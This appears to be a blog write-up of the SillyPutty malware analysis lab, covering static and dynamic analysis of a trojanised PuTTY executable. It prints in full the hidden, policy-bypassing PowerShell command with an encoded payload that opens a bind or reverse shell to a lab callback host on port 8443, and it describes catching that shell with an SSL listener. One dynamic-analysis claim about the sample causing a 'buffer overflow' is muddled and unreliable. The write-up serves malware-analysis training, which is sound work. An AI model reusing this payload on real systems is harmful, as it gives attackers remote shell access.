Lab: SillyPutty Challenge
Basic Static Analysis
I unpack the binary and open it in PEstudio, as that tool calculates relevant while giving me information about the binary itself.
Q: What is the SHA256 hash of the sample?
A: 0C82E654C09C8FD9FDF4899718EFA37670974C9EEC5A8FC18A167F93CEA6EE83
---
Q: What architecture is this binary?
A: 32 bit (x86) Windows Executable
---
Moving onto the next question I put the hash into Virus Total to see if there was anything flagged from it.
So the binary is a recognised trojan.
Q: Are there any results from submitting the SHA256 hash to VirusTotal?
Yes, the binary is a widely recognised trojan with reference to shellcode family so that can hint towards having shell code execution capabilities.
---
Q: Describe the results of pulling the strings from this binary. Record and describe any strings that are potentially interesting. Can any interesting information be extracted from the strings?
I then tried to sift through the strings pulled from the binary by PEstudio, sorting them by size, and found a powershell script with hidden window option, while I also analysed the binary using floss no extra information could be gleaned that way.
The full command is as follows:
`powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAOW/UWECA51W227jNhB991cMXHUtIRbhdbdAESCLepVsGyDdNVZu82AYCE2NYzUyqZKUL0j87yUlypLjBNtUL7aGczlz5kL9AGOxQbkoOIRwK1OtkcN8B5/Mz6SQHCW8g0u6RvidymTX6RhNplPB4TfU4S3OWZYi19B57IB5vA2DC/iCm/Dr/G9kGsLJLscvdIVGqInRj0r9Wpn8qfASF7TIdCQxMScpzZRx4WlZ4EFrLMV2R55pGHlLUut29g3EvE6t8wjl+ZhKuvKr/9NYy5Tfz7xIrFaUJ/1jaawyJvgz4aXY8EzQpJQGzqcUDJUCR8BKJEWGFuCvfgCVSroAvw4DIf4D3XnKk25QHlZ2pW2WKkO/ofzChNyZ/ytiWYsFe0CtyITlN05j9suHDz+dGhKlqdQ2rotcnroSXbT0Roxhro3Dqhx+BWX/GlyJa5QKTxEfXLdK/hLyaOwCdeeCF2pImJC5kFRj+U7zPEsZtUUjmWA06/Ztgg5Vp2JWaYl0ZdOoohLTgXEpM/Ab4FXhKty2ibquTi3USmVx7ewV4MgKMww7Eteqvovf9xam27DvP3oT430PIVUwPbL5hiuhMUKp04XNCv+iWZqU2UU0y+aUPcyC4AU4ZFTope1nazRSb6QsaJW84arJtU3mdL7TOJ3NPPtrm3VAyHBgnqcfHwd7xzfypD72pxq3miBnIrGTcH4+iqPr68DW4JPV8bu3pqXFRlX7JF5iloEsODfaYBgqlGnrLpyBh3x9bt+4XQpnRmaKdThgYpUXujm845HIdzK9X2rwowCGg/c/wx8pk0KJhYbIUWJJgJGNaDUVSDQB1piQO37HXdc6Tohdcug32fUH/eaF3CC/18t2P9Uz3+6ok4Z6G1XTsxncGJeWG7cvyAHn27HWVp+FvKJsaTBXTiHlh33UaDWw7eMfrfGA1NlWG6/2FDxd87V4wPBqmxtuleH74GV/PKRvYqI3jqFn6lyiuBFVOwdkTPXSSHsfe/+7dJtlmqHve2k5A5X5N6SJX3V8HwZ98I7sAgg5wuCktlcWPiYTk8prV5tbHFaFlCleuZQbL2b8qYXS8ub2V0lznQ54afCsrcy2sFyeFADCekVXzocf372HJ/ha6LDyCo6KI1dDKAmpHRuSv1MC6DVOthaIh1IKOR3MjoK1UJfnhGVIpR+8hOCi/WIGf9s5naT/1D6Nm++OTrtVTgantvmcFWp5uLXdGnSXTZQJhS6f5h6Ntcjry9N8eXQOXxyH4rirE0J3L9kF8i/mtl93dQkAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"`
This had a base64 string in which I decoded in cyberchef, which I had to further decompress using gunzip gave the following script:
So going through this script I found a few interesting instances.
Depending on the options, this script could create either a bind shell (TCP 8443) or a reverse shell (bonus2[.]corporatebonusapplication[.]local, 8443).
---
Q: Describe the results of inspecting the IAT for this binary. Are there any imports worth noting?
I cross referenced with malapi.io to track down the malicious imports in the IAT and came up with a handful of them.
The imports mentioned range from file discovery (using registry and WinAPI) commonly seen in shell code execution malware alongside anti debugging techniques using 'IsDebuggerPresent' and shell execution api 'ShellExecuteA' alongside process creation imports.
---
Q: Is it likely that this binary is packed?
Not really, I checked the values in PEstudio and the size of initialised data added onto the size of code equal the size of image.
--- * ---
Basic Dynamic Analysis
Q: Describe initial detonation. Are there any notable occurrences at first detonation? Without internet simulation? With internet simulation?
The first detonation was carried out without any internet connection, notable occurrence would be a powershell window opening for a brief moment before disappearing.
I had procmon filtering for processes by the name of the executable while this was happening, which gave me a bit insight on what the executable did.
This section shows the binary querying the security files for itself, 'ntdll.dll' and 'kernel32.dll' and causing a buffer overflow, likely with the aim of granting itself privileges and access of the respective files.
Another thing was the affirmation of my initial assumptions from viewing the process tree from procmon, which showed a child process of `putty.exe` as `powershell.exe` which seemed to have spawned from the command I found in my static analysis.
On detonating with network connection, I setup monitoring with procmon and tcpview on host end while wireshark was watching at the remote end (remnux).
I caught a short lived connection made by powershell on tcpview but wasn't able to get any information from it, so I moved to remnux and wireshark did have some interesting bits for me.
So the malware queried the dns for the remote address we found in the powershell script, and then tried to send data to the TCP port 8443, which rejected all its connection requests as I had not set up a listener prior to detonation.
But this did provide conclusive evidence that this was a reverse shell malware.
---
Q: From the host-based indicators perspective, what is the main payload that is initiated at detonation? What tool can you use to identify this?
On the host based indicators, the main payload initiated at detonation would be the sneaky powershell script which attempts to spawn a reverse shell.
This can be identified by sysinternals tool called `procmon`.
---
Q: What is the DNS record that is queried at detonation?
A: bonus2[.]corporatebonusapplication[.]local
---
Q: What is the callback port number at detonation?
A: 8443
---
Q: What is the callback protocol at detonation?
A: TLS
---
Q: How can you use host-based telemetry to identify the DNS record, port, and protocol?
A: I can utilise wirehsark application installed on the flareVM as a host based telemetry to filter for requests going to a destination port 53, i.e., DNS requests to identify the DNS record, port and protocol.
---
Q: Attempt to get the binary to initiate a shell on the localhost. Does a shell spawn? What is needed for a shell to spawn?
So this was tricky, initial tries of listening with ncat always resulted in connection closing abruptly, then I went back to the script and apparently the option for ssl verification was true which is why the shell wasn't being created, as it needed an ssl connection.
So I set up one using ncat and that gave me access to the shell.
Comments
Post a Comment